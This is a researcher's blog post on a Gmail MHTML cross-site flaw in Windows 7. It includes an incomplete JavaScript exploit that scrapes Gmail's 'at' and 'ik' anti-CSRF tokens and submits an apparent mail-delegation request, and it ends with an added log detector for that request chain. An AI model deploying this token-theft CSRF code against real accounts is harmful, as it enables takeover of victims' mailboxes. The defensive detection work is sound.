RAyh4c Black Box
I haven't updated my blog for a long time. I dug out a piece of code I used to test the Gmail MHTML vulnerability on Windows 7; I don't know where I lost the full version I wrote --!
On Windows 7, an AJAX request issued through the MHTML vulnerability behaves differently from XP: on XP the request can go directly to an http: URL, but on Windows 7 the requested URL must itself use the mhtml: protocol, otherwise the request is denied for lack of permission. Why does the same-origin policy seem stricter on Windows 7 than on XP? I'm not sure anyone has noticed this detail.
To test Gmail's CSRF protection, you must obtain the at and ik parameters for the request to succeed. There are of course many ways to obtain these two values: they can be read from the cookie or taken directly from the page. The following code takes them directly from the page.
// Tmail is not defined in this fragment (it belonged to the lost full version).
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
// Step 1: fetch the basic-HTML view through the mhtml: protocol and read the "at" value from it.
xmlHttp.open("GET", "mhtml:https://mail.google.com/mail/h/0/", true);
xmlHttp.send();
xmlHttp.onreadystatechange = function () {
  if (xmlHttp.readyState == 4) {
    if (xmlHttp.status == 200) {
      rex = /href=".*?at=(.{34})">/.exec(xmlHttp.responseText);
      AThash = RegExp.$1;
      // Step 2: fetch the standard view and read the "ik" value from its GLOBALS array.
      xmlHttp.open("GET", "mhtml:https://mail.google.com/mail/", true);
      xmlHttp.send();
      xmlHttp.onreadystatechange = function () {
        if (xmlHttp.readyState == 4) {
          if (xmlHttp.status == 200) {
            rex = /GLOBALS=\[.*?,"(.{10})",/.exec(xmlHttp.responseText);
            IKhash = RegExp.$1;
            // Step 3: the CSRF request itself, sent with both values attached.
            xmlHttp.open("POST", "mhtml:https://mail.google.com/mail?ui=2" + "&ik=" + IKhash + "&view=mdlg&at=" + AThash, true);
            xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xmlHttp.send("mdrp=1&mda=%0D%0A" + Tmail + "%0D%0A");
          }
        }
      };
    }
  }
};
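From the server side, the code above leaves a recognisable trace: one session fetches the basic-HTML view (where at is read), then the standard view (where ik is read), then issues the view=mdlg POST, all within a few seconds. The following detector over constructed log lines is an added example and is not part of the original post; the log format, field names and session ids are assumptions made for the example.

```javascript
// Added example (not from the original post): flag the three-request chain
// the scraping code above produces, as seen in constructed server logs.
// The log format "<timestamp> sess=<id> <METHOD> <path>" is an assumption.
const SAMPLE_LOG = [
  '2011-03-01T10:00:00Z sess=A GET /mail/h/0/',
  '2011-03-01T10:00:01Z sess=A GET /mail/',
  '2011-03-01T10:00:02Z sess=A POST /mail?ui=2&ik=abcdefghij&view=mdlg&at=x',
  // Session B: a user who opened the standard view minutes earlier, then
  // used the delegation dialog by hand. Not flagged.
  '2011-03-01T10:05:00Z sess=B GET /mail/',
  '2011-03-01T10:09:00Z sess=B POST /mail?ui=2&ik=abcdefghij&view=mdlg&at=y',
];

function parseLine(line) {
  const m = /^(\S+) sess=(\S+) (GET|POST) (\S+)$/.exec(line);
  if (!m) return null;
  return { ts: Date.parse(m[1]), sess: m[2], method: m[3], path: m[4] };
}

// Returns the session ids whose view=mdlg POST was preceded, within windowMs,
// by GETs of both /mail/h/0/ (source of "at") and /mail/ (source of "ik").
// A browser user rarely visits both views and submits the dialog in seconds.
function findScriptedDelegationChains(lines, windowMs = 10000) {
  const bySession = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue;
    if (!bySession.has(r.sess)) bySession.set(r.sess, []);
    bySession.get(r.sess).push(r);
  }
  const flagged = [];
  for (const [sess, reqs] of bySession) {
    for (const r of reqs) {
      if (r.method !== 'POST' || !/[?&]view=mdlg(&|$)/.test(r.path)) continue;
      const recent = reqs.filter(
        p => p.method === 'GET' && p.ts <= r.ts && r.ts - p.ts <= windowMs);
      const sawBasic = recent.some(p => p.path === '/mail/h/0/');
      const sawFull = recent.some(p => p.path === '/mail/');
      if (sawBasic && sawFull && !flagged.includes(sess)) flagged.push(sess);
    }
  }
  return flagged;
}

console.log(findScriptedDelegationChains(SAMPLE_LOG)); // [ 'A' ]
```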